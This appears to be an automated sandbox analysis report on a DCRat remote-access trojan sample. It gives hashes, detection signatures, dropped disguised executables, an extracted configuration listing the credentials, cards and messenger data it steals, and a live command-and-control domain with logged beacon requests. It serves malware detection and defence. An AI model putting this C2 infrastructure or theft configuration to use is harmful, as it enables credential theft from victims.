Windows Analysis Report
QT4aLb3P98.exe

Overview

General Information

Sample name: QT4aLb3P98.exe
renamed because original name is a hash value
Original sample name: 1a9c19cd373f9ce0642f18f6965521b3.exe
Analysis ID: 1483427
MD5: 1a9c19cd373f9ce0642f18f6965521b3
SHA1: 64bc66f217964ab7310084cc9b2e4ef72ea7156b
SHA256: 82bea7c0254a8a0b675f8702eb3dafbbcc608bdb672738d159b33ae699a4d5bb
Tags: DCRatexe
Infos:

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Execution from Suspicious Folder
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: QT4aLb3P98.exe Avira: detected
Antivirus detection for URL or domain
Source: http://a1009608.xsph.ru/ Avira URL Cloud: Label: malware
Source: http://a1009608.xsph.ru/1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470d5=3fcabe54654b82392e895aa4c4e7b395&a9d3e3cdc71e35b96ad20cf4efbd4740=gY3MmNzQjNkhTNzE2M1YWZwAjZ1QTZ0ITO1Y2NmVmY4YDNwEzYjZmM&rgHy1i1qGuabZNE=KZftVioRcmp7cZPF Avira URL Cloud: Label: malware
Source: http://a1009608.xsph.ru Avira URL Cloud: Label: malware
Source: http://a1009608.xsph.ru/@=MjZ2QmMzETM Avira URL Cloud: Label: malware
Source: http://a1009608.xsph.ru/1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470 Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Found malware configuration
Source: 00000000.00000002.1688308009.000000001327F000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: DCRat {"SCRT": "{\"o\":\")\",\"L\":\"`\",\"t\":\" \",\"F\":\"_\",\"p\":\"!\",\"A\":\",\",\"w\":\"*\",\"5\":\"#\",\"l\":\"~\",\"H\":\"@\",\"Y\":\"|\",\"I\":\"%\",\"a\":\"<\",\"O\":\".\",\"m\":\";\",\"9\":\"&\",\"h\":\"-\",\"y\":\"^\",\"W\":\">\",\"T\":\"(\",\"i\":\"$\"}", "PCRT": "{\"l\":\"@\",\"V\":\"|\",\"Q\":\".\",\"0\":\"^\",\"X\":\",\",\"U\":\"!\",\"m\":\";\",\"8\":\"-\",\"z\":\"&\",\"B\":\"(\",\"J\":\"`\",\"Y\":\")\",\"1\":\"$\",\"w\":\"%\",\"n\":\"<\",\"d\":\"#\",\"N\":\"*\",\"K\":\"_\",\"h\":\">\",\"S\":\"~\",\"F\":\" \"}", "TAG": "", "MUTEX": "DCR_MUTEX-YA1pCSAA9lv2Umt03noS", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://a1009608.xsph.ru/@=MjZ2QmMzETM", "H2": "http://a1009608.xsph.ru/@=MjZ2QmMzETM", "T": "0"}
Multi AV Scanner detection for domain / URL
Source: a1009608.xsph.ru Virustotal: Detection: 12% Perma Link
Source: http://a1009608.xsph.ru Virustotal: Detection: 12% Perma Link
Source: http://a1009608.xsph.ru/ Virustotal: Detection: 12% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe ReversingLabs: Detection: 84%
Source: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe Virustotal: Detection: 68% Perma Link
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe ReversingLabs: Detection: 84%
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Virustotal: Detection: 68% Perma Link
Multi AV Scanner detection for submitted file
Source: QT4aLb3P98.exe ReversingLabs: Detection: 84%
Source: QT4aLb3P98.exe Virustotal: Detection: 68% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe Joe Sandbox ML: detected
Source: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: QT4aLb3P98.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: QT4aLb3P98.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Directory created: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Directory created: C:\Program Files\Windows Defender\en-GB\62cf92e5da7ec3 Jump to behavior
Source: QT4aLb3P98.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\AppData\Local Jump to behavior

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://a1009608.xsph.ru/@=MjZ2QmMzETM
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 141.8.192.103 141.8.192.103
Source: Joe Sandbox View IP Address: 141.8.192.103 141.8.192.103
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SPRINTHOSTRU SPRINTHOSTRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470d5=3fcabe54654b82392e895aa4c4e7b395&a9d3e3cdc71e35b96ad20cf4efbd4740=gY3MmNzQjNkhTNzE2M1YWZwAjZ1QTZ0ITO1Y2NmVmY4YDNwEzYjZmM&rgHy1i1qGuabZNE=KZftVioRcmp7cZPF HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1009608.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470d5=3fcabe54654b82392e895aa4c4e7b395&a9d3e3cdc71e35b96ad20cf4efbd4740=gY3MmNzQjNkhTNzE2M1YWZwAjZ1QTZ0ITO1Y2NmVmY4YDNwEzYjZmM&rgHy1i1qGuabZNE=KZftVioRcmp7cZPF HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1009608.xsph.ru
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470d5=3fcabe54654b82392e895aa4c4e7b395&a9d3e3cdc71e35b96ad20cf4efbd4740=gY3MmNzQjNkhTNzE2M1YWZwAjZ1QTZ0ITO1Y2NmVmY4YDNwEzYjZmM&rgHy1i1qGuabZNE=KZftVioRcmp7cZPF HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1009608.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470d5=3fcabe54654b82392e895aa4c4e7b395&a9d3e3cdc71e35b96ad20cf4efbd4740=gY3MmNzQjNkhTNzE2M1YWZwAjZ1QTZ0ITO1Y2NmVmY4YDNwEzYjZmM&rgHy1i1qGuabZNE=KZftVioRcmp7cZPF HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1009608.xsph.ru
Source: global traffic DNS traffic detected: DNS query: a1009608.xsph.ru
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sat, 27 Jul 2024 11:07:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sat, 27 Jul 2024 11:07:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002639000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002660000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a1009608.xsph.ru
Source: wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002625000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002639000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a1009608.xsph.ru/
Source: wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002639000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a1009608.xsph.ru/1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470
Source: QT4aLb3P98.exe, 00000000.00000002.1687936780.000000000344F000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002639000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002660000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cp.sprinthost.ru
Source: wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002660000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cp.sprinthost.ru/auth/login
Source: wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002660000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://index.from.sh/pages/game.html
Creates files inside the system directory
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File created: C:\Windows\Media\Sonata\wRRcPdViqk.exe Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File created: C:\Windows\Media\Sonata\wRRcPdViqk.exe\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File created: C:\Windows\Media\Sonata\62cf92e5da7ec3 Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B88CC28 0_2_00007FFD9B88CC28
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B88C420 0_2_00007FFD9B88C420
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B894C40 0_2_00007FFD9B894C40
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B8833B0 0_2_00007FFD9B8833B0
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B88C230 0_2_00007FFD9B88C230
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B891090 0_2_00007FFD9B891090
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B88A68D 0_2_00007FFD9B88A68D
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B8935C8 0_2_00007FFD9B8935C8
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B894268 0_2_00007FFD9B894268
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B894100 0_2_00007FFD9B894100
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B889C9F 0_2_00007FFD9B889C9F
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 10_2_00007FFD9B8B3555 10_2_00007FFD9B8B3555
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B891090 11_2_00007FFD9B891090
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B88C230 11_2_00007FFD9B88C230
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B88A131 11_2_00007FFD9B88A131
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B88A68D 11_2_00007FFD9B88A68D
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B887431 11_2_00007FFD9B887431
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B883555 11_2_00007FFD9B883555
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 12_2_00007FFD9B8B7431 12_2_00007FFD9B8B7431
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 12_2_00007FFD9B8B3555 12_2_00007FFD9B8B3555
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 12_2_00007FFD9B8C1090 12_2_00007FFD9B8C1090
PE file contains executable resources (Code or Archives)
Source: QT4aLb3P98.exe Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: wRRcPdViqk.exe.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: wRRcPdViqk.exe0.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Sample file is different than original file name gathered from version info
Source: QT4aLb3P98.exe, 00000000.00000002.1687778525.0000000001770000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename( vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe, 00000000.00000002.1687698529.0000000001740000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename$ vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe, 00000000.00000002.1688308009.000000001363F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename$ vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe, 00000000.00000000.1668798576.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe, 00000000.00000002.1687312608.000000000154F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe, 00000000.00000002.1687312608.000000000154F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe, 00000000.00000002.1687936780.0000000003315000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename( vs QT4aLb3P98.exe
Source: QT4aLb3P98.exe Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs QT4aLb3P98.exe
Uses 32bit PE files
Source: QT4aLb3P98.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: QT4aLb3P98.exe, LWnyVJYJI3UvpfiEQ9Z.cs Cryptographic APIs: 'TransformBlock'
Source: QT4aLb3P98.exe, LWnyVJYJI3UvpfiEQ9Z.cs Cryptographic APIs: 'TransformFinalBlock'
Source: QT4aLb3P98.exe, vAvRw3K4pP2OrHcG5JZ.cs Cryptographic APIs: 'CreateDecryptor'
Source: QT4aLb3P98.exe, vAvRw3K4pP2OrHcG5JZ.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.QT4aLb3P98.exe.1740000.1.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.QT4aLb3P98.exe.1363f588.4.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.QT4aLb3P98.exe.1770000.2.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.QT4aLb3P98.exe.331e6c8.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.evad.winEXE@16/11@1/1
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File created: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\QT4aLb3P98.exe.log Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Mutant created: NULL
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\491eb635c9cefa2a7c4721bdd3f84f9fc3429b6d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5448:120:WilError_03
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File created: C:\Users\user\AppData\Local\Temp\wLOamAKQX5 Jump to behavior
